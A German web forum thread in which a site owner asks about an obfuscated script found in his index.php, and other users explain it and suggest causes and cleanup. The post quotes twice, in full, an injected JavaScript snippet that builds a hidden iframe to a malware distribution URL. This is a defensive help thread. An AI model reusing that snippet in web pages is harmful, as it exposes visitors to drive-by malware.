Ergebnis 1 bis 9 von 9

Thema: wichtig, brauche rat eines proggers | BestGreenStreet.com Malware

Hybrid-Darstellung

Vorheriger Beitrag Vorheriger Beitrag   Nächster Beitrag Nächster Beitrag
  1. #1
    Erfahrener Benutzer Avatar von dude32
    Registriert seit
    27.07.2006
    Beiträge
    1.771

    Ausrufezeichen wichtig, brauche rat eines proggers | BestGreenStreet.com Malware

    hallo

    habe von eingen user vermehrt erfahren, das ihr virenscanner alarm schlägt, wenn sie einer meiner seiten besuchen

    habe mir nun mal die index vorgenommen und folgendes gefunden:

    PHP-Code:
    <meta name="verify-v1" content="rXQqvX7jV6XCe0D/jrv036HrngHHXk+e72Csl6upeEs=" /> 
    <!-- 
    --><script>var fvk="<";var wph="i";var jvnka=" ";var gomnh="nhbcn='nEK6DQJo' doial='dhCke37D' gdzzh='gQWd7VrL' gazuj='hJVRBJkH' hxzpl='81GXG6dn' lsoir='yU8BhjRB' ngggo='xYmvNtUu' lrfwl='txkXFkqC' kxnos='qC3DWG3h' src=";var jzuvy="ame>";var cilee="om/tds/go.php?sid=1&xu=j";var beabi="?fpqUf ";var qzx="f";var jjm="r";var cyt="a";var cwapy="cpydh='aiptWeJC' gvhgz='i6pumOkl' gwyzq='hAUfSYnT' gypth='hE8P7iqB' gagmz='eTR4OD2h' fgodg='chkkfjFC' dqntd='X6hLXacU' bbmjz='VL01o6o0' ahuag='QkydgyBI' ";var unz="m";var oxo="e";var zpzre="width=612 ";var glvei="http://bestgreenstreet.c";var vmpsa="height=328 ";var qjfsw="style='display:none'";var clcnd=glvei+cilee;var mgvts="></ifr";document.write(fvk+wph+qzx+jjm+cyt+unz+oxo+jvnka+gomnh+clcnd+beabi+cwapy+zpzre+vmpsa+qjfsw+mgvts+jzuvy);</script><!-- --> 
    was ist das????
    www.scripte-box.de VMS,VMS2 und FWX

  2. #2
    Erfahrener Benutzer Avatar von Gremlin
    Registriert seit
    05.07.2006
    Beiträge
    5.206
    Also das verify-v1 müsste ein Meta-Tag sein was du mal bei Analytics o.Ä. benutzt hast.

    Der zweite Code:

    Code:
    <!-- o --><script>var fvk="<";var wph="i";var jvnka=" ";var gomnh="nhbcn='nEK6DQJo' doial='dhCke37D' gdzzh='gQWd7VrL' gazuj='hJVRBJkH' hxzpl='81GXG6dn' lsoir='yU8BhjRB' ngggo='xYmvNtUu' lrfwl='txkXFkqC' kxnos='qC3DWG3h' src=";var jzuvy="ame>";var cilee="om/tds/go.php?sid=1&xu=j";var beabi="?fpqUf ";var qzx="f";var jjm="r";var cyt="a";var cwapy="cpydh='aiptWeJC' gvhgz='i6pumOkl' gwyzq='hAUfSYnT' gypth='hE8P7iqB' gagmz='eTR4OD2h' fgodg='chkkfjFC' dqntd='X6hLXacU' bbmjz='VL01o6o0' ahuag='QkydgyBI' ";var unz="m";var oxo="e";var zpzre="width=612 ";var glvei="http://bestgreenstreet.c";var vmpsa="height=328 ";var qjfsw="style='display:none'";var clcnd=glvei+cilee;var mgvts="></ifr";document.write(fvk+wph+qzx+jjm+cyt+unz+oxo+jvnka+gomnh+clcnd+beabi+cwapy+zpzre+vmpsa+qjfsw+mgvts+jzuvy);</script><!-- c -->
    Das ding erzeugt ein iframe zu einer Domain:
    http://bestgreenstreet.com/tds/go.php?sid=1&xu=j Absichtlich nicht verlinkt

    Diese meldet Firefox als attackierende Webseite!

    Also raus damit! Wie er nun darein kam weiß ich nicht, da müsste man ursachenforschung betreiben, irgendeine Lücke in einem Script. Bei klamm gibt es auch einen Thread dazu http://www.klamm.de/forum/showthread.php?t=223792
    Diskutiere nie mit Idioten - sie holen Dich auf ihr Niveau und schlagen Dich dort mit Erfahrung!



  3. #3
    Erfahrener Benutzer Avatar von dude32
    Registriert seit
    27.07.2006
    Beiträge
    1.771
    und wie kommt das in die index.php der seiten rein???
    ohne ftp zugang??? betrifft ja nicht nur meine seiten, sondern auch lose-segen.de
    www.scripte-box.de VMS,VMS2 und FWX

  4. #4
    Erfahrener Benutzer Avatar von jpwfour
    Registriert seit
    06.02.2008
    Beiträge
    3.717
    Zitat Zitat von dude32 Beitrag anzeigen
    und wie kommt das in die index.php der seiten rein???
    ohne ftp zugang??? betrifft ja nicht nur meine seiten, sondern auch lose-segen.de
    naja, wer sagt denn, dass der/die betreffende person/bot nicht ftp zugang hat? oder gibt es bei dir dazu logs?

    also auf jeden fall mal passwörter ändern (kann ja mal nie schaden), evtl wurden diese auch per bruteforce geknackt, oder dein hoster hat eine sicherheitslücke, oder ein anderer user, der auf dem gleichen server wie du ist, hat eine möglichkeit entdeckt, dateien anderer zu bearbeiten (kann schon immer mal wieder besonders bei freehostern oder "kleineren" hoster auftreten).

    oder aber ein addon/script, was du guten gewissens installiert/hinzugefügt hast, verändert deine php dateien...

    also möglichkeiten gibt es viele, die eigentliche ursache rauszufinden kann aber doch auch schwierig werden.

    erstmal natürlich alle solcher änderungen rückgängig machen,
    ftp passwort ändern,
    evtl logs durchsuchen (sofern vorhanden),
    das ganze dem support des hosters mitteilen,
    hoffen, dass der schadcode/adcode nicht gleich wieder drin ist...

    evtl hast du auch einen trojaner/sonstigen blödsinn auf deinem rechner, der deinen ftp clienten infiziert/manipuliert hat, so dass beim übertragen von dateien immer dieser code hinzugefügt wird (kann man ja testen).

    also auch mal kompletten virenscann machen
    Kill one man, and you are a murderer.
    Kill millions of men, and you are a conqueror.
    Kill them all, and you are a god.
    - Jean Rostand, Thoughts of a Biologist (1939)

  5. #5
    Erfahrener Benutzer
    Registriert seit
    16.06.2009
    Beiträge
    2.346
    da gab es doch mal ein problem mit dem mozilla kostenlosen filezilla-ftp programm das index.php geändert hat weil es infiziert war

    gibt irgendwo alten beitrag, schon vor 2-3 jahren mal in gespräch gewesen hier

    DimpleX


    Zitat Zitat von dude32 Beitrag anzeigen
    und wie kommt das in die index.php der seiten rein???
    ohne ftp zugang??? betrifft ja nicht nur meine seiten, sondern auch lose-segen.de

  6. #6
    Erfahrener Benutzer Avatar von maniwelt
    Registriert seit
    10.09.2006
    Beiträge
    981
    Ausserdem noch folgendes in einem forum gefunden:


    Damit Google deine Sitemap überhaupt annimmt und einliest, musst du dich anmelden und verifizieren, entweder durch so einen Meta-Tag oder durch eine erstellte HTML-Seite mit einem vorgegebenen Namen.
    Sollte auch dein Fall sein
    Diese Signatur war zu groß ~cdp~

    Meine Antwort: Ach jaaaa ?

  7. #7
    Erfahrener Benutzer Avatar von dude32
    Registriert seit
    27.07.2006
    Beiträge
    1.771
    habe nie eine sitemap erstellt, oder einen code dafür eingefügt
    www.scripte-box.de VMS,VMS2 und FWX

  8. #8
    Erfahrener Benutzer Avatar von maniwelt
    Registriert seit
    10.09.2006
    Beiträge
    981
    Sollte aber der Fall sein, lies mal hier duch:

    http://www.typo3forum.net/forum/html...1-content.html


    EDIT:

    Beim KLAMM auch was interessantes gefunden

    http://www.klamm.de/forum/showthread.php?t=223792
    Diese Signatur war zu groß ~cdp~

    Meine Antwort: Ach jaaaa ?

  9. #9
    Benutzer1699
    Gast
    benutzt du filezilla zum Übertragen deiner Websites?

Ähnliche Themen

  1. Aus dem Leben eines Gamers :D
    Von breaker im Forum Eierforum
    Antworten: 1
    Letzter Beitrag: 01.02.2014, 10:38
  2. Domain gibt Malware Warnung aus
    Von Kraemer84 im Forum [HD] Grafik, Server & Sonstiges
    Antworten: 8
    Letzter Beitrag: 13.04.2013, 18:07
  3. Google-Werbung wird als Malware-Schleuder missbraucht
    Von Newsbot im Forum Talk, talk, talk...
    Antworten: 0
    Letzter Beitrag: 18.10.2008, 13:00
  4. Löschung eines Wichtig Posts!
    Von dr_duetz im Forum Support zum VMSone
    Antworten: 0
    Letzter Beitrag: 07.03.2007, 15:19

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •